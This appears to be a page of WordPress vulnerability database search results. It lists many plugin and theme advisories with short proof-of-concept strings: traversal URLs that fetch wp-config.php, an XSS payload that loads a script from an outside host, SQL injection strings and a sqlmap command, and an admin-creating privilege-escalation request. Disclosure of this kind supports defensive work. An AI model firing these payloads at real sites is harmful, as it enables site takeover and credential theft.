4359 matches found
Admin Pack by SITE CASEIRO <= 1.1 - Authenticated Stored Cross-Site Scripting (XSS)
The admin-pack-by-site-caseiro WordPress plugin was affected by an Authenticated Stored Cross-Site Scripting XSS security vulnerability...
Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)
The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://localhost:8080/?pageid=0&&errorsfu-disallowed-mime-type0name=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E...
Wordpress CodeArt Google MP3 Player - File Disclosure
The google-mp3-audio-player WordPress plugin was affected by a File Disclosure security vulnerability. http://www.example.com/wp-content/plugins/google-mp3-audio-player/directdownload.php?file=../../../wp-config.php...
Dailydeal by Templatic - CSRF File Upload
The dailydeal WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/dailydeal/images/tmp/yourshell.php...
Nightlife by Templatic - CSRF File Upload
The nightlife WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/nightlife/images/tmp/yourshell.php...
Prostore < 1.1.3 - Open Redirection
The prostore WordPress theme was affected by an Open Redirection security vulnerability. /wp-content/themes/prostore/go.php?https://example.com...
Support Ticket System By Phoeniixx <= 2.7 - Unauthenticated Reflected XSS
Bad user input sanitisation leads to unauthenticated reflected XSS. Edit WPScanTeam: January 27th, 2020 - Report received & WP Plugin team notified January 31st, 2020 - WP plugin team acknowledgement & plugin closed. April 11th, 2020 - No updates, disclosing...
Superlist <= 2.9.2 - Stored Cross-Site Scripting (XSS)
Persistent XSS was discovered in the 'Superlist - Directory WordPress Theme', the version tested was v2.9.2. Edit WPScanTeam: December 2nd, 2019 - Envato Contacted December 2nd, 2019 - Envato Investigating December 12th, 2019 - No updates, disclosing The PoC will be displayed once the issue has...
Qwiz Online Quizzes And Flashcards <= 3.36 - Unauthenticated Reflected Cross Site Scripting
The qname, iqwiz, sessionid and username parameters passed to the registrationcomplete.php file are affected by XSS issues. Plugin has been closed while the issue is being fixed. /wp-content/plugins/qwiz-online-quizzes-and-flashcards/registrationcomplete.php?&qname=alert"XSS"...
Gallery Photoblocks < 1.1.41 - Unauthenticated Reflected XSS
Also Full Path Disclosure depending on the configuration of the server https:///wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id="...
Newsletter Manager < 1.5 - Unauthenticated Open Redirect
The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header PHP function, leading to an open redirect issue In the file '/newsletter-manager/confirmation.php': 33: $xyzemurl = base64decode$GET'appurl'; ... 179:...
Social Media & Share Icons <= 2.1.7 - Multiple Issues
The Social Media Share Buttons & Social Sharing Icons WordPress plugin was affected by a Multiple Issues security vulnerability. https://plugins.trac.wordpress.org/browser/ultimate-social-media-icons/tags/2.1.7/libs/controllers/sfsibuttonscontroller.phpL877...
Better WordPress reCAPTCHA <= 2.0.3 - Unauthenticated Cross-Site Scripting (XSS)
There is a reflected XSS vulnerability in Better WordPress reCAPTCHA plugin version 2.0.3, and possibly below. The parameter cerror value is reflected in the page when this plugin is enabled. Once plugin disabled, the "cerror" parameter's value is not reflected in the page anymore. This is the HT...
Ultimate Product Catalogue <= 4.2.2 - Authenticated SQL Injection
Type user access: subscriber upwards. $POST‘CatID’ is not escaped. File / Code: Path: /wp-content/plugins/ultimate-product-catalogue/Functions/ProcessAjax.php...
Woo Custom Checkout Field <= 1.3.4 - CSRF & Stored XSS
Due to a lack of CSRF mitigation and entity encoding in the ccfinsert function found on line 118 of include/ccf.php and in the output generated by template/datagrid.php, it is possible to store and execute scripts in the context of an admin user...
Simple Photo Gallery 1.7.8 - Blind SQL Injection
MySQL = 5.0.12 AND time-based blind SELECT sql injection in the galleryid parameter. ./sqlmap.py --dbms=MYSQL --technique T -u http://www.example.com/wordpress/index.php/wppgphotogallery/wppgphotodetails/?galleryid=1&imageid=14...
Premium SEO Pack 1.8.0 - Unauthenicated Arbitrary File Upload & LFD
This plugin is vulnerable to Local File Disclosure and Remote Code Execute via Arbitrary File Upload. BASE64 ENCODED SHELL...
QAEngine Theme - Privilege Escalation
QAEngine vulnerability allows an attacker to have an administrator account on the target's website. http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&userlogin=xADMIN&userpass=xPASS&role=administrator...
Aspose Cloud eBook Generator - File Download
The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/aspose-cloud-ebook-generator/asposepostsexporterdownload.php?file=../../../wp-config.php...
Quasar Theme Rock Form Builder plugin - Privilege Escalation
The Rock Form Builder plugin 1.0 is used within the Quasar WooCommerce theme 1.9.1. Authenticated users can modify WordPress settings which can lead to full site compromise. It's unclear which exact version of the rock-form-builder fixed the issue, but it was something in between 1.0 and 2.5, so...
SEO Redirection < 2.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
The plugin did not sanitise the referer link from requests before displaying them in the 'Settings SEO Redirection Redirection History' page. This result in a Store dCross-Site Scripting XSS issue This cURL request to a redirected page with a custom referer makes it possible: curl -H 'Referer:...
NativeChurch Theme - Arbitrary File Download
Description The NativeChurch WordPress theme was affected by an Arbitrary File Download security vulnerability. https://example.com/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php...
wp-FileManager <= 1.3.0 - File Download
The wp-filemanager WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download...
WooCommerce Conversion Tracking < 2.0.5 - CSRF to XSS
The settings page of the plugin is lacking CSRF checks as well as input sanitisation, leading to stored XSS. ' /...
WP Custom Body Class <= 0.7.0 - CSRF to Stored XSS and Settings Update
Lack of CSRF check and sanitisation when updating the plugin's settings could lead to unauthorised settings update as well as stored XSS issues XSS fixed in 0.7.0. CSRF still there - vendor contacted CSRF fixed in 0.7.1 /wp-admin/options-general.php?page=custombodyclass" method="POST" ' /...
Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting (XSS)
The Blog Designer WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. Send POST request to: /wp-admin/admin-ajax.php?action=save&updated=true With request body: customcss=confirm1...
Custom Permalinks <= 1.1 - Authenticated SQL Injection
Missing checking of user controllable input during Bulk Action in the Custom Permalinks backend page leads to SQL injection vulnerability. Send authenticated POST request to "URL/wp-admin/admin.php?page=custom-permalinks-post-permalinks" with parameters "action=delete&permalinks=1 PAYLOAD -- "...
WordPress Task Manager Pro <= 1.3.1 - Authenticated SQL Injection
Blind SQL Injection on task-details page task parameter. Logged as a follower: https://localhost/wp/wp-admin/admin.php?page=task-details&task=6+and+sleep1+and+1%3D1...
Email Before Download < 4.0 - SMTP Header Injection
Email Before Download https://wordpress.org/plugins/email-before-download/ before version 4.0 was vulnerable to an SMTP header injection which allows abuse of vulnerable website to send spam or phishing emails. In email-before-download.php, the "emailFrom" variable comes directly from the...
AffiliateWP <= 2.0.9 - Authenticated Cross-Site Scripting (XSS)
The AffiliateWP WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability. http://vulnerablesite.com//wp-admin/admin.php?page=affiliate-wp-referrals&filterfrom=%27%3C%2Fscript%3E%3Cscript%3Ealert%2842%29%3C%2Fscript%3E...
Row Seats Core <= 2.66 - Unauthenticated PHP Object Injection
The plugin row-seats insecurely trusts serialized data submitted over HTTP requests. This opens up the site to a PHP object injection vulnerability potential exploit vector. This vulnerability was patched in version 2.68, information is being released now as a disclosure period has expired. Attac...
Answer My Question 1.3 - Cross-Site Scripting (XSS)
The answer-my-question WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. Host: 10.194.0.44 URL: http://10.194.0.44/wp-content/plugins/answer-my-question/modal.php Parameter: Hidden Field id Payload: "alert1...
AccessPress Social Icons < 1.6.8 - Authenticated SQL Injections
During the security analysis, ThunderScan discovered SQL injection vulnerabilities in AccessPress Social Icons WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plug...
XCloner - Backup and Restore < 3.1.5 - Authenticated Path Traversal
Authenticated users are able to perform directory listings at any location available to the Wordpress user, leaking filenames of previous backups. This was found in XCloner - Backup and Restore version 3.1.4, but may have been introduced in earlier versions. Attackers can leverage directory...
Product Catalog 8 1.2 - Unauthenticated SQL Injection
$POST ‘selectedCategory’ is not escaped. UpdateCategoryList is accessible for any user...
Memphis Document Library Plugin <= 3.1.5 - Arbitrary File Download
The function "mdocsimgpreview" is in charge of downloading image previews previously uploaded by the administrator, but it does not sanitize the file path being downloaded, thus, allowing to download arbitrary files in the file system. The vulnerable GET parameter is "mdocs-img-preview". The...
ABtest - File Inclusion
The abtest WordPress plugin was affected by a File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/abtest/abtestadmin.php?action=../../../../../../../../../../../../../../../proc/self/environ%00...
Advanced uploader - Local File Inclusion
The Advanced uploader WordPress plugin was affected by a Local File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00...
Music Store <= 1.0.14 - Referer Header Open Redirect
The Music Store – WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability. GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language:...
WordPress prettyPhoto <= 1.1 - DOM Cross-Site Scripting (XSS)
The WordPress prettyPhoto WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/prettyPhotogallery/1,/...
Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection
Unauthenticated SQL injection in parameter "SingleProduct" when a web visitor explores a product published by the web administrator. This exploit needs magicquotesgpc turned off in the destination server. File Functions/Shortcodes.php line 779 http:///?SingleProduct=2'+and+'a'='a...
WordPress Video Gallery <= 2.8 - SQL Injection
Note: The vendor patched the issue but did not change the version number. Using fixed in version 2.8.1 for detection reasons although in reality this version does not exist at the time of writing. http://www.example.com/wp-admin/admin-ajax.php?action=googleadsense&vid=SQLi...
Duplicator <= 0.5.14 - SQL Injection & CSRF
An authorised user with "export" permission or a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin CSRF. http://www.example.com/wp-admin/admin-ajax.php?action=duplicatorpackagedelete PO...
Feedweb 2.4.1-3.0.6 - SQL Injection
The feedweb WordPress plugin was affected by a SQL Injection security vulnerability. http://www.example.com/wp-content/plugins/feedweb/widgetcontainer.php?pid= Inject here &ishp=true...
GI-Media Library <= 2.2.2 - Arbitrary File Download
The gi-media-library WordPress plugin was affected by an Arbitrary File Download security vulnerability. /wp-content/plugins/gi-media-library/download.php?fileid=Li4vLi4vLi4vd3AtY29uZmlnLnBocA== Where "Li4vLi4vLi4vd3AtY29uZmlnLnBocA==" is "../../../wp-config.php" Base64 encoded...
Plugin HD Webplayer <= 1.1 - SQL Injections
The last time it was checked the plugin was still affected and had been closed. http://example.com/wp-content/plugins/hd-webplayer/config.php?id=INJECT HERE http://example.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=INJECT HERE...
WP Fastest Cache < 0.9.0.3 - Cross-Site Request Forgery (CSRF) Arbitrary File Deletion
The plugin did not have a CSRF nonce check on the "wpfcdeletecurrentpagecache" action, allowing CSRF attacks against authenticated users to delete arbitrary files, including the wp-config.php file. document.form.submit;...
WP Accessibility < 1.7.0 - Minor Authenticated Stored XSS in custom CSS
A minor authenticated stored XSS vulnerability was found in the "Styles for Skiplinks when they have focus" section of the WP Accessibility plugin. 1 Navigate to the Settings page of the plugin https://example.com/wp-admin/options-general.php?page=wp-accessibility/wp-accessibility.php 2 Select th...
Safe SVG < 1.9.6 - XSS Protection Bypass
By using entities in payload XSS will success to bypass the protection of the Safe SVG Plugin Video POC for Video PoC for v1.9.5 : https://www.youtube.com/watch?v=hnQA2hc-4k...
User Registration <= 1.5.5 - Authenticated Cross-Site Scripting (XSS)
The User Registration – Custom Registration Form, Login And User Profile For WordPress WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability...